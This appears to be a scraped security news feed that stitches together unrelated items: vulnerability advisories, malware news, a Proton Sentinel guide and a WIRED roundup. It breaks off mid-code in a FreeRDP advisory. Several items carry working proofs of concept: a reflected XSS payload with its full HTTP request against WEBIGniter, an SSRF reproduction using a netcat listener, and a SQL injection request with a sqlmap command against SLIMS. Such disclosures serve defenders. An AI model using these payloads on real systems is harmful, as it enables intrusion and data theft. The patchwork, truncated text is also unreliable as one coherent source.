A hard coded password in Super Store Finder v3.6 allows attackers to access the administration panel.

**3.7** (Last updated: 24 Aug 2023)

*   Upgrade admin login library. Fixed a vulnerability issue if default admin username is not changed to something else.
*   Removed predefined field values at admin login page
*   Frontend query enhanced security update

**3.6** (Last updated: 27 Nov 2022)

*   Added lat and lng url parameter to be passed to store locator map
*   Added location url parameter to be passed to store locator map

**3.5** (Last updated: 15 Jun 2022)

*   Added Approve/Disapprove toggler at admin store listing page

**3.4** (Last updated: 7 May 2021)

*   Fixed PHP deprecated method warning message from showing

**3.3** (Last updated: 12 Dec 2019)

*   Added GDPR Compliant settings
*   Updated send mail charset header

**3.2** (Last updated: 20 Jul 2019)

*   Added Google Geocoding key field (for import) at admin settings page

**3.1** (Last updated: 20 Mar 2019)

*   Added category url parameter

**3.0** (Last updated: 17 Aug 2018)

*   Update installation file to support HTTPS / SSL

**2.9** (Last Update  6 June 2016)

*   Updated latest Geo IP Database (More Info)

**2.9.1** (Last Update 28 June 2016)

*   Added Google API key field at admin settings page

**2.9.2** (Last Update 21 July 2016)

*   Fixed double Google Maps API call at Request Add Store page

**2.9.3** (Last Update 31 Mar 2017)

*   Added API key in import/geocode module

**2.9.4** (Last Update 8 Jul 2018)

*   Removed sensor parameter from Google Maps API calls

**2.8 \* MAJOR UPDATE \*** (Last Update 11 Jan 2016)

*   Updated all codes to mysqli
*   Added print button at directions page
*   added contact form

**2.8.1** (Last Update 1 April 2016)

*   Added Thumbnail Previewer for image uploader

**2.7** (Last Update 27 June 2015)

*   Added embed video functionality (upgrade instructions here)

**2.6** (Last Update 21st June 2015)

*   You can now paste custom google maps style code (i.e snazzymaps.com) via admin settings page
*   Added sort by approved status for stores in admin area

**2.5** (Last Update 7th June 2015)

*   Added search box widget
*   Added language translation for Street View, Zoom here, Directions

**2.4 \* MAJOR UPDATE \***(Last Update 22nd Feb 2015)

*   Added settings page at Admin Area (More Details)
*   Set General settings such as default distance, language, zoom levels, geo ip enabled/disabled, default location, etc
*   Set Styles settings such as top bar color, buttons color, results list color, map hue color, etc

**2.3** version 2.3 (Last Update 3rd Feb 2015)

*   Fixed miles and km issue during finding stores
*   Fixed radius issue in responsive version
*   Added default distance unit at installation page

**2.2** version 2.2 (Last Update 31st Jan 2015)

*   Fixed scrolling list issue that scrolls the entire page
*   Added scroll easing effect
*   Enhanced Request Add Store page for the responsive version
*   Enhanced embed feature for responsive and Compact themes

**2.1** (Last updated: 29 Jan 2015)

*   Added 2 steps Installation Tool for Super Store Finder

**2.0** (Last updated: 2 Jan 2015)

*   Added Geo IP functionality that able to detect visitor City and Country.
*   Fixed drag and drop longitude detection at Add / Edit Store page due to Google Maps Update

**1.9** (Last updated: 4 Sept 2014)

*   Drag and Drop Marker is now available at request add store, add new store and edit store page.

**1.9.1** (Last updated: 18 Nov 2014)

*   Maps at store finder, add store, request add store and edit stop not displaying due to Geo IP public javascript provided by maxmind no longer working as they start charging. Patch has been added to fix the issue, for more info visit the FAQ pagehttp://codecanyon.net/item/super-store-finder/3630922/faqs/22312

**1.8** (Last updated: 15 Aug 2014)

*   Added import and geo code stores from csv list at admin area
*   Added backup export stores at admin area
*   Added restore stores feature at admin area
*   Video for Import/Geocode CSV List, Backup and Restore available here.

**1.8.1** (Last updated: 24 Aug 2014)

*   Added append options for CSV import & geocode

**1.7** (Last updated: 13 Aug 2014)

*   Fixed result scroll to view upon clicking marker
*   Fixed bouncing markers issue
*   Replace obsolete mktime function at admin login page
*   Fixed pagination in category page
*   Fixed pagination in admin user list page

**1.6** (Last updated: 25 Mar 2014)

*   Fixed distance radius more than 1000 miles/km

**1.6.1** (Last updated: 11 April 2014)

*   Fixed distance bug in Firefox non EN language settings

**1.5** (Last updated: 28 Jan 2013)

*   Updated to jQuery 1.9
*   Responsive version is now available for download
*   Fixed pagination bug in admin
*   Fixed misc javascript and bootstrap conflict error

**1.5.1** (Last updated: 28 Jan 2013)

*   Improve the layout of responsive version

**1.5.2** (Last updated: 30 Jan 2013)

*   Added responsive embed code for templates with dynamic sizes

**1.5.3** (Last updated: 16 Mar 2013)

*   Fixed transparency for png category icon
*   Add store search filter in administrator’s area

**1.5.4** (Last updated: 27 Mar 2013)

*   Fixed address list inconsistency in Firefox and Chrome browser

**1.5.5** (Last updated: 14 Mar 2014)

*   Fixed text encoding issues
*   Fixed embed code in responsive version
*   Fixed front end CSS for responsive version

**1.5.6** (Last updated: 15 Mar 2014)

*   Fixed distance sorting issue (solution in FAQ here)

**1.5.7** (Last updated: 17 Mar 2014)

*   \-Multi-language for no nearby stores notification fix

**1.4** (Last updated: 28 Dec 2012)

*   Google Maps Direction feature is now live and available for download

**1.3** (Last updated: 27 Dec 2012)

*   Added Street view link at info window
*   Added Zoom here link at info window
*   Searching store by category is now available
*   Upload and customize category icons

**1.2** (Last updated: 18 Dec 2012)

*   Supports multi-language with 8 language file translations included
*   Users are able to set default language from config file (config.inc.php)
*   Languages Pack download page is now available (Email me if you would like to contribute your translation; refer FAQ for guide)
*   Fixed Store Finder misc CSS issues
*   Email notification is now in various languages
*   Description will now be shown at front end unless blank

**1.2.1** (Last updated: 18 Dec 2012)

*   Super Store Finder Import Tool using CSV is now available
*   Added pagination to store list at backend
*   Added pagination to user admin list at backend
*   Added Arabic language

**1.2.2** (Last updated: 20 Dec 2012)

*   Fixed pagination showing extra empty page

**1.2.3** (Last updated: 21 Dec 2012)

*   Fixed floating map covering form in add / edit store page in admin area

**1.1** (Last updated: 16 Dec 2012)

*   Fixed misc Javascript and CSS Issues

CVE-2023-41508: Patch Notes (Last updated: 25 Aug 2023)

WEBIGniter version 28.7.23 suffers from a cross site scripting vulnerability.

    ## Title: WEBIGniter-28.7.23-XSS-Reflected## Author: nu11secur1ty## Date: 09/04/2023## Vendor: https://webigniter.net/## Software: https://webigniter.net/demo## Reference: https://portswigger.net/web-security/cross-site-scripting## Description:The value of the redirect request parameter is copied into the valueof an HTML tag attribute which is encapsulated in double quotationmarks. The payload ycsz3"><script>alert(1)</script>bn76w was submittedin the redirect parameter. This input was echoed unmodified in theapplication's response.By using this Java Script injection, the attacker can trick a lot ofusers into visiting his dangerous URL which is reflected on the loginform, before they log in, warning them that there is a problem withthe login, which is very nasty and DANGEROUS!## Staus: HIGH Vulnerability[+]Paylod:```GETGET /cms/login?redirect=cmsycsz3%22%3e%3cscript%3ealert(1)%3c%2fscript%3ebn76wHTTP/1.1Host: demo.webigniter.netAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141Safari/537.36Connection: closeCache-Control: max-age=0Upgrade-Insecure-Requests: 1Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WEBIGniter/2023/WEBIGniter-28.7.23-XSS-Reflected)## Proof and Exploit[href](https://www.nu11secur1ty.com/2023/09/webigniter-28723-xss-reflected.html)## Time spent:01:35:00

WEBIGniter 28.7.23 Cross Site Scripting

Banking and logistics industries are under the onslaught of a reworked variant of a malware called Chaes.
"It has undergone major overhauls: from being rewritten entirely in Python, which resulted in lower detection rates by traditional defense systems, to a comprehensive redesign and an enhanced communication protocol," Morphisec said in a new detailed technical write-up shared with The Hacker

Banking and logistics industries are under the onslaught of a reworked variant of a malware called **Chaes**.

"It has undergone major overhauls: from being rewritten entirely in Python, which resulted in lower detection rates by traditional defense systems, to a comprehensive redesign and an enhanced communication protocol," Morphisec said in a new detailed technical write-up shared with The Hacker News.

Chaes, which first emerged in 2020, is known to target e-commerce customers in Latin America, particularly Brazil, to steal sensitive financial information.

A subsequent analysis from Avast in early 2022 found that the threat actors behind the operation, who call themselves Lucifer, had breached more than 800 WordPress websites to deliver Chaes to users of Banco do Brasil, Loja Integrada, Mercado Bitcoin, Mercado Livre, and Mercado Pago.

Further updates were detected in December 2022, when Brazilian cybersecurity company Tempest Security Intelligence uncovered the malware's use of Windows Management Instrumentation (WMI) in its infection chain to facilitate the collection of system metadata, such as BIOS, processor, disk size, and memory information.

The latest iteration of the malware, dubbed **Chae$ 4** in reference to debug log messages present in the source code, packs in "significant transformations and enhancements," including an expanded catalog of services targeted for credential theft as well as clipper functionalities.

Despite the changes in the malware architecture, the overall delivery mechanism has remained the same in attacks that were identified in January 2023.

Potential victims landing on one of the compromised websites are greeted by a pop-up message asking them to download an installer for Java Runtime or an antivirus solution, triggering the deployment of a malicious MSI file that, in turn, launches a primary orchestrator module known as ChaesCore.

The component is responsible for establishing a communication channel with the command-and-control (C2) server from where it fetches additional modules that support post-compromise activity and data theft -

*   **Init**, which gathers extensive information about the system
*   **Online**, which acts as a beacon to transmit a message back to the attacker that the malware is running on the machine
*   **Chronod**, which steals login credentials entered in web browsers and intercept BTC, ETH, and PIX payment transfers
*   **Appita**, a module with similar features as that of Chronod but specifically designed to target Itaú Unibanco's desktop app ("itauaplicativo.exe")
*   **Chrautos**, an updated version of Chronod and Appita that focuses on gathering data from Mercado Libre, Mercado Pago, and WhatsApp
*   **Stealer**, an improved variant of Chrolog which plunders credit card data, cookies, autofill, and other information stored in web browsers, and
*   **File Uploader**, which uploads data related to MetaMask's Chrome extension

Persistence on the host is accomplished by means of a scheduled task, while C2 communications entail the use of WebSockets, with the implant running in an infinite loop to await further instructions from the remote server.

The targeting of cryptocurrency transfers and instant payments via Brazils' PIX platform is a noteworthy addition that underscores the threat actors' financial motivations.

UPCOMING WEBINAR

Detect, Respond, Protect: ITDR and SSPM for Complete SaaS Security

Discover how Identity Threat Detection & Response (ITDR) identifies and mitigates threats with the help of SSPM. Learn how to secure your corporate SaaS applications and protect your data, even after a breach.

Supercharge Your Skills

"The Chronod module introduces another component used in the framework, a component called Module Packer," Morphisec explained. "This component provides the module its own persistence and migration mechanisms, working much like the ChaesCore's one."

This method involves altering all shortcut files (LNK) associated with web browsers (e.g., Google Chrome, Microsoft Edge, Brave, and Avast Secure Browser) to execute the Chronod module instead of the actual browser.

"The malware uses Google's DevTools Protocol to connect to the current browser instance," the company said. "This protocol allows direct communication with the inner browser's functionality over WebSockets."

"The wide range of capabilities exposed by this protocol allows the attacker to run scripts, intercept network requests, read POST bodies before being encrypted, and much more."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Python Variant of Chaes Malware Targets Banking and Logistics Industries

Chrome browser extensions can steal passwords from the text input fields in websites, despite Chrome's latest security and privacy standard, Manifest V3.



(Read more...)




The post Password-stealing Chrome extension smuggled on to Web Store appeared first on Malwarebytes Labs.

Researchers at the University of Wisconsin–Madison have demonstrated that Chrome browser extensions can steal passwords from the text input fields in websites, even if the extension is compliant with Chrome's latest security and privacy standard, Manifest V3.

To prove it, they created a proof of concept browser extension that could steal passwords and put it through the Chrome Web Store review process.

Browser extentions are small applications like ad blockers and password managers that extend the capabilities of browsers. In order to do what they do they enjoy a high degree of access to both the web browser and the pages the browser displays. This creates a significant challenge for vendors like Google.

On the one hand, the more access browser extensions enjoy, the more they can do and the more useful and featureful they can be. On the other hand, extensions are made by third-parties who may or may not be trustworthy, and the more access they have, the more harm they can do if they are malicious.

Google's best, most recent stab at enforcing a sensible balancing act between those two things is the Manifest V3 standard, which has also been adopted by Microsoft Edge and Mozilla Firefox.

Manifest V3 tightens up security in a number of ways, most notably by stopping extensions from downloading code from remote websites. This stops them from changing their functionality after they've been installed, which makes it easier for Google to understand what an extension does during the Chrome Web Store review process.

Although Manifest V3 makes life tougher for malicious extensions that want to steal passwords and other sensitive information, the researchers have demonstrated it's still possible to get a password-stealing extension through the review process.

> The attack is feasible because the interaction between the extensions and the web pages has not changed. The extensions can still access entire contents of the web pages, including text input fields where users may enter sensitive information such as passwords, Social Security Numbers (SSN), and Credit Card information.

The attack's success hinges on the fact that extensions have full and unfettered access to the Document Object Model (DOM) of every web page you visit. The DOM is a representation of a web page in computer memory that can be accessed and changed, allowing the page to be modified on-the-fly.

> ...when an extension is loaded onto a website, it is integrated into the DOM tree, obtaining unrestricted access to all DOM elements via the DOM APIs. This exposes a critical security issue – the lack of a security boundary between the extension and the rest of the DOM tree.

Full access to a page's DOM gives extensions tremendous power, which includes reading or modifying text input fields, like the ones you type your passwords into. The success of the researchers' technique depends on the way the page is designed, but the paper claims that most of the top 10,000 websites are vulnerable, including the likes of google.com, facebook.com, gmail.com, cloudflare.com, and amazon.com, among others.

To prove the technique was viable in the real world the researchers created a browser extension disguised as a "GPT-based assistant offering ChatGPT-like functions on websites". This allowed the extension to plausibly ask for permission to run on all websites. (It was withdrawn as soon as it passed the review process.)

Having established that it was possible for a malicious extension using these techniques to pass the review process, the researchers analysed the extensions already on the web store and found that 12.5% of them had the necessary permissions to exploit the password input field vulnerabilities, and identified 190 extensions that directly access password fields.

The researchers offer two potential fixes: A "bolt on" remedy for vulnerable sites and a "built in" remedy for browsers. The bolt on is a JavaScript library that can be added to websites to prevent unwanted access to password fields. To be successful it would need to be widely adopted and, frankly, history suggests it probably wouldn't be. The built in remedy suggests changing Chrome to alert users whenever any JavaScript function accesses any password fields. This would be no small undertaking, but seems more likely to succeed if Google can be persuaded to adopt it.

Malwarebytes EDR and MDR remove all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Password-stealing Chrome extension smuggled on to Web Store

If you want the highest possible level of protection, this is it.

There's a constant battle going on between software developers trying to keep their apps and platforms secure, and hackers and malware writers eager to break through those digital defenses. In its quest to offer a more secure and private suite of web apps, security-focused service provider Proton is rolling out a new feature called Proton Sentinel.

If you're new to Proton, the Switzerland-based company offers email, VPN, cloud storage, and various other digital services, with a clear emphasis on security and privacy. It's a bit like Google without the tracking or the ads, and the newly unveiled Proton Sentinel is a “high-security program” for keeping users and their data safe.

It's worth emphasizing that Proton accounts already come with a bunch of security features and protections to keep out bad actors. There's end-to-end, zero-access encryption for user data, there's two-factor authentication to help you prove you are who you say you are when you log in, there's a custom-built spam filtering system, there are real-time notifications of logins, and more.

However, Sentinel goes further. Proton describes the additional feature as offering more protection than most people will need, aimed at “users who need the most security”: Journalists, government officials, religious leaders, and leaders of international peace organizations are mentioned as some of those who are particularly at risk from hacking attempts.

You can enable Sentinel from inside your Proton account.

Proton via David Nield

"Accounts such as these have a high risk of being attacked by criminals or state-backed hackers," writes Proton's Dingchao Lu. “We are now ready to provide the same level of advanced protection and support that we reserved for these VIPs to any Proton user that wants it through the Proton Sentinel program.”

You don't have to fall into one of those categories to use Proton Sentinel, but you do have to be a paying Proton user: a Visionary, Lifetime, Family, Unlimited, or Business plan is required, and you can see details of all the plans here.

A lot of the work that Proton Sentinel does goes on behind the scenes, and you'll find that Proton itself doesn't go into too much detail about how it functions—which is sensible if you want to minimize the chances of someone else getting around it.

The advanced security protection it offers includes strict challenges for “suspicious” login attempts, typically those from devices that you don't normally use and parts of the world that you're not normally in. You might find yourself asked to confirm more of your logins to Proton services with Sentinel enabled, but it's worth it for the extra peace of mind.

Proton says that suspicious logins are flagged by automated systems and then escalated to human security analysts, around the clock. Any support requests you file related to account security will also get escalated to trained security specialists, meaning that if there is a security problem, it's going to be dealt with more quickly.

Related to this stricter policy on logins, Proton Sentinel also gives you access to detailed security logs inside your account, listing attempts to log in using your credentials, as well as other key actions you need to be aware of (such as password changes.)

More detailed security logs are available with Proton Sentinel.

Proton via David Nield

If you're on board with Proton Sentinel and everything that it offers, log into your Proton account on the web. Click the **settings** cogwheel, then **Go to settings**, and then **Security and privacy**: At the top of the screen there should be an **Enable Proton Sentinel** toggle switch that you can turn on. That's all there is to it: You're now protected.

Farther down the same screen is the security logs panel: Turn on both **Enable authentication logs** and **Enable advanced logs** to get all of the information possible about when and where your account is being used. All successful and unsuccessful login attempts are listed here, since the very first day you opened your Proton account—and if security actions were taken on a login attempt, this will be recorded next to it.

If you see something you don't recognize, you can click the **Revoke** button next to an existing session: The device in question will be remotely logged out, and a fresh sign-in will be required to use Proton's apps on that device. It's better to err on the side of caution here, and log out from any sessions that you don't immediately recognize. If you do notice anything suspicious, you should contact Proton Support too.

Proton Sentinel is simple to set up, takes very little effort to maintain, and keeps your Proton account as well protected as possible—so it makes a lot of sense to enable the feature. Like the Enhanced Safety Mode that Google offers as part of Chrome's feature set, Sentinel goes above and beyond the norms to make sure that there's no unauthorized access to your account.

How to Use Proton Sentinel to Keep Your Accounts Safe

Debian Linux Security Advisory 5487-1 - A security issue was discovered in Chromium, which could result in the execution of arbitrary code.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5487-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffAugust 31, 2023                       https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2023-4572Debian Bug     : 1024981A security issue was discovered in Chromium, which could result in theexecution of arbitrary code.For the oldstable distribution (bullseye), this problem has been fixedin version 116.0.5845.140-1~deb11u1.For the stable distribution (bookworm), this problem has been fixed inversion 116.0.5845.140-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmTw5XQACgkQEMKTtsN8TjY4RQ//b6+fDtZKSmdGZi9IFFjHnEa3/qG2C6KcR13vwLJRysGoiFhu0B+58s2UU10Gdbo1/Qx6E5qwO0WaUHnlm2q56E8xt/MZ1C44lrI2/QByjnljX/BznbVu5IOmesgLz6Slf+L8goykVug6OW0cZpe5yiXL7Cg6qM9+K3e+7kIiif4DylYnOSHNZ4JprQE01W/6JziWeqcYEPpR4LoqhzRFQZQXRNdgKZWfy33dRmt+qWFE7eGpmLDltKcLe4A6iti3VxG5Ktn/fD84i41sjr4vM1PHrvuPwp1btLsgmbbZiElTBjpb6csAfOU/woGiwX7ak3iUW1l0sqoh2ksanmEZesvTpfBQ9BsfO8NrBmsJhmGNN+N8o5xroYFKhlt6+Xc9R7iRYBZxHQuohUjojKK0Nebh8QLL6oW+aMgxq4pVyDE3qwf7Rsd+V6Biq57Yq2MjLlzO7+y/VXs6fUyqjo/pKbgZADDXTYGzcq23eMJX15vvueeFLTR1ZasAwj9E2qgLl70+vecDLHpFXx2YBK2JYqUS1dZUHXQMr7PigOxFkF2U94bnhll/emcGgP7qpaPgC7KEjk8MPF+q3jLezSdzUdMLfUmUN9NR7a14euSr8blXSaZg30KPz6gVyvrUBpF6g1zJlDtcS2IYTkk2FtwzR2RpDgtFh5YZl/pnZ+VFrKE==LVjS-----END PGP SIGNATURE-----

Debian Security Advisory 5487-1

Plus: A major FBI botnet takedown, new Sandworm malware, a cyberattack on two major scientific telescopes—and more.

A monthslong WIRED investigation published this week revealed the inner workings of the Trickbot ransomware gang, which has targeted hospitals, businesses, and government agencies around the world. 

The investigation stemmed from a mysterious leak publish on X (formerly Twitter) last year by an anonymous account called Trickleaks. The document trove contained dossiers on 35 alleged Trickbot members, including names, dates of birth, and much more. It also listed thousands of IP addresses, cryptocurrency wallets, email addresses, and Trickbot chat logs. Armed with this information, we enlisted the help of multiple cybersecurity and Russian cybercrime experts to paint a vivid picture of Trickbot’s organizational structure and corroborate the real-world identity of one of its key members. 

Last weekend, someone (more on that later) successfully disrupted more than 20 trains in Poland. The incidents were originally described as a “cyberattack,” but it was actually something much simpler: a radio hack. Using equipment that can cost as little as $30, the attack exploited the trains’ unencrypted radio system to cause them to perform an emergency stop. 

Over on the dark web, cybercriminals are making money in an unexpected way: writing contests. With total prizes reaching as high as $80,000, the competitions enlist hacking forum members to craft the best essays, many of which explain how to carry out cyberattacks and scams. 

Last December, Apple officially killed its controversial photo-scanning tool for detecting child sexual abuse material (CSAM) on iCloud, a tool the company launched in August 2021 before un-launching it a month later after backlash from cybersecurity experts, civil liberties advocates, and others who argued that the tool would violate users’ security and privacy. But the issue is far from resolved. This week, a new child safety group called Heat Initiative demanded that Apple reinstate the tool. Apple responded with a letter, which it shared with WIRED, detailing for the first time its full reasoning behind terminating the tool. Heat Initiative’s push comes amid international pressure to weaken encryption for law enforcement purposes.

Elsewhere, we detailed the big security patches you need to install to keep your devices safe (looking at you, Google Chrome and Android users). And we dove into the supremely nerdy world of a code-cracking competition that had contestants racing to decode a German U-boat cipher from World War II. One team had a secret weapon.

But that’s not all. Each week, we round up the security and privacy news we didn’t cover in depth ourselves. Click the headlines to read the full stories. And stay safe out there.

When more than 20 trains in Poland were bought to a halt last weekend in what was described as a “cyberattack,” all eyes turned to Russia. After all, Poland’s rails serve as a key piece of infrastructure for supporting Ukraine’s war effort. But as we reported a day later, the disruption had been caused not through any sophisticated cyber intrusion but through a simple radio hack that sent a “radio stop” command to the Polish trains over an unencrypted and unauthenticated system. “The frequencies are known. The tones are known. The equipment is cheap,” Polish-speaking cybersecurity researcher Lukasz Olejnik told WIRED. “Everybody could do this. Even teenagers trolling.”

Well, not teenagers exactly, but twentysomethings. This week, Polish police arrested a 24-year-old man and a 29-year-old man, both Polish citizens, who allegedly carried out the radio train hack. One of the two men, based in the city of Bialystok near the border with Belarus, was a police officer. Amateur radio equipment was found in one of their apartments, according to Poland’s RMF Radio, where the younger man was found (reportedly in a drunken state).

2 Polish Men Arrested for Radio Hack That Disrupted Trains

Senayan Library Management Systems SLIMS 9 Bulian v9.6.1 is vulnerable to Server Side Request Forgery (SSRF) via admin/modules/bibliography/pop_p2p.php.

**The bug**

A Server Side Request Forgery exists in admin/modules/bibliography/pop_p2p.php at the code below

$detail\_uri = $\_GET\['uri'\] . "/index.php?p=show\_detail&inXML=true&id=" . $\_GET\['biblioID'\];
// parse XML
$data = modsXMLsenayan($detail\_uri, 'uri');

**To Reproduce**

**Steps to reproduce the behavior:**

1.  Login as admin or user that has access to bibliography
2.  set up netcat to listen to a specific port (example: 7878)
3.  go to the /admin/modules/bibliography/pop_p2p.php?uri=http://LOCALHOST_OR_LISTENER_IP:7878
4.  the netcat should receive a request

**Screenshots****proof-of-concept using pipedream****proof-of-concept using netcat****versions**

*   Browser: Google Chrome | 115.0.5790.114 (Official Build) (x86\_64)  
    Slims Version: slims9\_bulian-9.6.1

CVE-2023-40969: [Security Bugs]  Server Side Request Forgery at pop_p2p.php · Issue #204 · slims/slims9_bulian

Senayan Library Management Systems SLIMS 9 Bulian v 9.6.1 is vulnerable to SQL Injection via admin/modules/circulation/loan_rules.php.

**The bug**

A SQL Injection exists in admin/modules/circulation/loan_rules.php at the code below

/\* RECORD OPERATION \*/
if (isset($\_POST\['saveData'\])) {
    $data\['member\_type\_id'\] = $\_POST\['memberTypeID'\];
    $data\['coll\_type\_id'\] = $\_POST\['collTypeID'\];
    $data\['gmd\_id'\] = $\_POST\['gmdID'\];
    $data\['loan\_limit'\] = trim($\_POST\['loanLimit'\]);
    $data\['loan\_periode'\] = trim($\_POST\['loanPeriode'\]);
    $data\['reborrow\_limit'\] = trim($\_POST\['reborrowLimit'\]);
    $data\['fine\_each\_day'\] = trim($\_POST\['fineEachDay'\]);
    $data\['grace\_periode'\] = trim($\_POST\['gracePeriode'\]);
    $data\['input\_date'\] = date('Y-m-d');
    $data\['last\_update'\] = date('Y-m-d');
    // create sql op object
    $sql\_op = new simbio\_dbop($dbs);
    if (isset($\_POST\['updateRecordID'\])) {
        /\* UPDATE RECORD MODE \*/
        // remove input date
        unset($data\['input\_date'\]);
        // filter update record ID
        $updateRecordID = (integer)$\_POST\['updateRecordID'\];
        // update the data
        $update = $sql\_op\->update('mst\_loan\_rules', $data, 'loan\_rules\_id='.$updateRecordID);
        if ($update) {
            toastr(\_\_('Loan Rules Successfully Updated'))->success();
            echo '<script language="Javascript">parent.jQuery(\\'#mainContent\\').simbioAJAX(parent.jQuery.ajaxHistory\[0\].url);</script>';
        } else { toastr(\_\_('Loan Rules FAILED to Updated. Please Contact System Administrator')."\\nDEBUG : ".$sql\_op\->error)->error(); }
        exit();
    } else {
        /\* INSERT RECORD MODE \*/
        $insert = $sql\_op\->insert('mst\_loan\_rules', $data); // BUG HERE
        if ($insert) {
            toastr(\_\_('New Loan Rules Successfully Saved'))->success();
            echo '<script language="Javascript">parent.jQuery(\\'#mainContent\\').simbioAJAX(\\''.$\_SERVER\['PHP\_SELF'\].'\\');</script>';
        } else { toastr(\_\_('Loan Rules FAILED to Save. Please Contact System Administrator')."\\n".$sql\_op\->error)->error(); }
        exit();
    }
    exit();
} 

**To Reproduce**

**Steps to reproduce the behavior:**

1.  Login as admin or user that has access to circulation
    
2.  make sure burp suit is on to capture the request such as below:
    

3.  save the request into a file (example.req)
    
4.  run the test with sqlmao with the command sqlmap -r example.req --level 5 --risk 3 -p gmdID --random-agent --dbms=mysql  
    
5.  voila
    

**example.req**

    POST /slims9_bulian-9.6.1/admin/modules/circulation/loan_rules.php?action=detail&ajaxload=1 HTTP/1.1
    Host: localhost
    Content-Length: 1195
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypqBOyIslkQAaoPCi
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Referer: http://localhost/slims9_bulian-9.6.1/admin/index.php?mod=circulation
    Accept-Encoding: gzip, deflate
    Accept-Language: id,en-US;q=0.9,en;q=0.8,ru;q=0.7
    Cookie: SenayanAdmin=d79m01ubrn9d8cagafoflttg3m; admin_logged_in=1; SenayanMember=q0e3uf77qcmobchek4aciibpul; PHPSESSID=rh1hmcqfrm2a33e96b5lmtujn0
    Connection: close
    
    ------WebKitFormBoundarypqBOyIslkQAaoPCi
    Content-Disposition: form-data; name="csrf_token"
    
    98420c7b2b5656890daf0f80b7756a6bb63fac37cb8ad1ac40a7b3ab4cde54c9
    ------WebKitFormBoundarypqBOyIslkQAaoPCi
    Content-Disposition: form-data; name="form_name"
    
    mainForm
    ------WebKitFormBoundarypqBOyIslkQAaoPCi
    Content-Disposition: form-data; name="memberTypeID"
    
    1
    ------WebKitFormBoundarypqBOyIslkQAaoPCi
    Content-Disposition: form-data; name="collTypeID"
    
    1
    ------WebKitFormBoundarypqBOyIslkQAaoPCi
    Content-Disposition: form-data; name="gmdID"
    
    0
    ------WebKitFormBoundarypqBOyIslkQAaoPCi
    Content-Disposition: form-data; name="loanLimit"
    
    1
    ------WebKitFormBoundarypqBOyIslkQAaoPCi
    Content-Disposition: form-data; name="loanPeriode"
    
    1
    ------WebKitFormBoundarypqBOyIslkQAaoPCi
    Content-Disposition: form-data; name="reborrowLimit"
    
    1
    ------WebKitFormBoundarypqBOyIslkQAaoPCi
    Content-Disposition: form-data; name="fineEachDay"
    
    1
    ------WebKitFormBoundarypqBOyIslkQAaoPCi
    Content-Disposition: form-data; name="gracePeriode"
    
    1
    ------WebKitFormBoundarypqBOyIslkQAaoPCi
    Content-Disposition: form-data; name="saveData"
    
    Save
    ------WebKitFormBoundarypqBOyIslkQAaoPCi--
    

**Screenshots****proof-of-concept current database**

command to run sqlmap -r example.req --level 5 --risk 3 -p gmdID --random-agent --dbms=mysql  --current-db  

**versions**

*   Browser: Google Chrome | 115.0.5790.114 (Official Build) (x86\_64)  
    Slims Version: slims9\_bulian-9.6.1

**notes**

added comment of the bug. last edit at 18 August 2023 21.12 GMT+7

CVE-2023-40970: [Security Bugs] SQL Injection at loan_rules.php · Issue #205 · slims/slims9_bulian

FreeRDP is a free implementation of the Remote Desktop Protocol (RDP), released under the Apache license. Affected versions are subject to an Out-Of-Bounds Read in the `nsc_rle_decompress_data` function. The Out-Of-Bounds Read occurs because it processes `context->Planes` without  checking if it contains data of sufficient length. Should an attacker be able to leverage this vulnerability they may be able to cause a crash. This issue has been addressed in versions 2.11.0 and 3.0.0-beta3. Users are advised to upgrade. There are no known workarounds for this vulnerability.

**Affected versions**

<= 2.10.0 , <= 3.0.0-beta2

**Patched versions**

2.11.0, 3.0.0-beta3

**Summary**

Out-Of-Bounds Read in nsc_rle_decompress_data

**Affected**

FreeRDP based clients only. FreeRDP proxy not affected as image decoding is not done by proxy (data passthrough)

**Details**

static BOOL nsc\_stream\_initialize(NSC\_CONTEXT\* context, wStream\* s)

{

int i;

if (!Stream\_CheckAndLogRequiredLength(TAG, s, 20))

return FALSE;

for (i \= 0; i < 4; i++)

Stream\_Read\_UINT32(s, context\->PlaneByteCount\[i\]);

Stream\_Read\_UINT8(s, context\->ColorLossLevel); /\* ColorLossLevel (1 byte) \*/

Stream\_Read\_UINT8(s, context\->ChromaSubsamplingLevel); /\* ChromaSubsamplingLevel (1 byte) \*/

Stream\_Seek(s, 2); /\* Reserved (2 bytes) \*/

context\->Planes \= Stream\_Pointer(s);

return TRUE;

}

context->Planes is assigned in the nsc_stream_initialize function.

static BOOL nsc\_rle\_decompress\_data(NSC\_CONTEXT\* context)

{

UINT16 i;

BYTE\* rle;

UINT32 planeSize;

UINT32 originalSize;

if (!context)

return FALSE;

rle \= context\->Planes;

for (i \= 0; i < 4; i++)

{

